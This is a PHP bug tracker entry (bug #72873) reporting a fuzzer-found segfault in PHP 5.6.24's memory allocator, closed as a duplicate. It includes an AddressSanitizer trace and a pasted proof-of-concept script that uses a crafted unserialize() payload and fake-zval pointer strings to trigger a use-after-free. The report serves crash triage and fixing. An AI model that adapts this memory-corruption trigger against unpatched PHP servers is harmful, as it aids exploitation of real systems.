php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #72873 segfault zend_alloc.c:837 (zend_mm_remove_from_free_list)
Submitted: 2016-08-17 20:05 UTC Modified: 2018-08-14 14:49 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:0 (0.0%)
Same OS:0 (0.0%)
From: brian dot carpenter at gmail dot com Assigned: cmb (profile)
Status: Duplicate Package: Reproducible crash
PHP Version: 5.6.24 OS: Debian 8
Private report: No CVE-ID: None
View Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
If you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: brian dot carpenter at gmail dot com
New email:
PHP Version: OS:

 

 [2016-08-17 20:05 UTC] brian dot carpenter at gmail dot com
Description:
------------
Fuzzing PHP 5.6.24 (x64) with American Fuzzy Lop, ASAN and libdislocator.so.


Test script:
---------------
https://dl.dropboxusercontent.com/u/6088006/segfault_zend_mm_remove_from_free_list

Expected result:
----------------
No crash.

Actual result:
--------------
geeknik@debian:~/php-tmp/crashers/100816$ ./php segfault_zend_mm_remove_from_free_list 

Warning: Unexpected character in input:  ' in /home/geeknik/php-tmp/crashers/100816/segfault_zend_mm_remove_from_free_list on line 33
NULL
ASAN:SIGSEGV
=================================================================
==58429==ERROR: AddressSanitizer: SEGV on unknown address 0x000dcfff8023 (pc 0x0000014cedfd bp 0x7f6a828efdb7 sp 0x7ffe8af9d3f0 T0)
    #0 0x14cedfc in zend_mm_remove_from_free_list /home/geeknik/php-5.6.24/Zend/zend_alloc.c:837:7
    #1 0x14c7bf5 in _zend_mm_free_int /home/geeknik/php-5.6.24/Zend/zend_alloc.c:2105:3
    #2 0x14ccb17 in _efree /home/geeknik/php-5.6.24/Zend/zend_alloc.c:2440:2
    #3 0x1679f9a in zend_object_std_dtor /home/geeknik/php-5.6.24/Zend/zend_objects.c:57:3
    #4 0x167ae1a in zend_objects_free_object_storage /home/geeknik/php-5.6.24/Zend/zend_objects.c:137:2
    #5 0x169c115 in zend_objects_store_free_object_storage /home/geeknik/php-5.6.24/Zend/zend_objects_API.c:97:5
    #6 0x155ab23 in shutdown_executor /home/geeknik/php-5.6.24/Zend/zend_execute_API.c:290:3
    #7 0x15b0f83 in zend_deactivate /home/geeknik/php-5.6.24/Zend/zend.c:960:2
    #8 0x13b807e in php_request_shutdown /home/geeknik/php-5.6.24/main/main.c:1899:2
    #9 0x1908b17 in do_cli /home/geeknik/php-5.6.24/sapi/cli/php_cli.c:1177:3
    #10 0x190474d in main /home/geeknik/php-5.6.24/sapi/cli/php_cli.c:1378:18
    #11 0x7f6a80edeb44 in __libc_start_main /build/glibc-uPj9cH/glibc-2.19/csu/libc-start.c:287
    #12 0x5095ac in _start (/home/geeknik/php-5.6.24/sapi/cli/php+0x5095ac)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/geeknik/php-5.6.24/Zend/zend_alloc.c:837 zend_mm_remove_from_free_list
==58429==ABORTING

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-08-17 20:07 UTC] stas@php.net
-Status: Open +Status: Feedback
 [2016-08-17 20:07 UTC] stas@php.net
I am not able to download the test script from the link.
 [2016-08-17 20:10 UTC] brian dot carpenter at gmail dot com
-Status: Feedback +Status: Open
 [2016-08-17 20:10 UTC] brian dot carpenter at gmail dot com
Sorry, Dropbox was being a turd. The test script is actually here: https://dl.dropboxusercontent.com/u/6088006/php/segfault_zend_mm_remove_from_free_list
 [2016-08-17 21:31 UTC] stas@php.net
The code is:

<?0==
$poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"tyat";R:3;s:4:"c|tg";i:2;}}i:1;i:3;i:2;R:5;G';
$out = unserialize($poc);
'';
	for ($i = 0; $i < 8; $i++) gc_collect_cycles();
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezvrl .= "d00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x0";
$fakezvcl .= "\x00\x00";
for ($i = 0; $i <55; $i++) {
	$v[$i] = $fa = unserialize($poc)^
gckezval.$i;
}
var_dump($out[2]);

class ryat
{
	var $ryat;
	var $chtg;
	
	function __destruct()
	{
		$this->chtg = $this;
	}
}

function ptr2str($ptr)
{
	$out = '';
	for ($i = 0; $i < 8; $i++) {
@$out .= chr($ptr & 0xff);
		$ptr >>= 8;
	}
	return $out;
}
 [2016-08-17 21:32 UTC] stas@php.net
-Type: Security +Type: Bug
 [2016-08-17 22:23 UTC] ryat@php.net
All these bugs are same as https://bugs.php.net/bug.php?id=72530. Plz don't repeat.
 [2018-08-14 14:49 UTC] cmb@php.net
-Status: Open +Status: Duplicate -Assigned To: +Assigned To: cmb
 [2018-08-14 14:49 UTC] cmb@php.net
> All these bugs are same as https://bugs.php.net/bug.php?id=72530.

So this is a duplicate of bug #72530.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Oct 31 22:01:27 2024 UTC